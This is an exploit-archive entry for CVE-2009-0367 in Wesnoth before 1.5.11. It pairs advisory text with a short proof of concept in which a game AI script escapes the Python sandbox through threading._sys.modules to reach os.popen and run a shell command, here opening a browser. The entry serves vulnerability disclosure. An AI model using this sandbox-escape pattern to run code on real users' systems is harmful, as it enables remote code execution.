Wesnoth 1.x - PythonAI Remote Code Execution

Author: Wesnoth
type: remote
platform: linux
port: 
date_added: 2009-02-25 
date_updated: 2014-04-13 
verified: 1 
codes: CVE-2009-0367;OSVDB-53877 
tags: 
aliases:  
screenshot_url:  
application_url: 

source: https://www.securityfocus.com/bid/33971/info

Wesnoth is prone to a remote code-execution vulnerability caused by a design error.

Attackers can exploit this issue to execute arbitrary Python code in the context of the user running the vulnerable application.

Versions prior to Wesnoth 1.5.11 are affected.

#!WPY
import threading
os = threading._sys.modules['os']
f = os.popen("firefox 'http://www.example.com'")
f.close()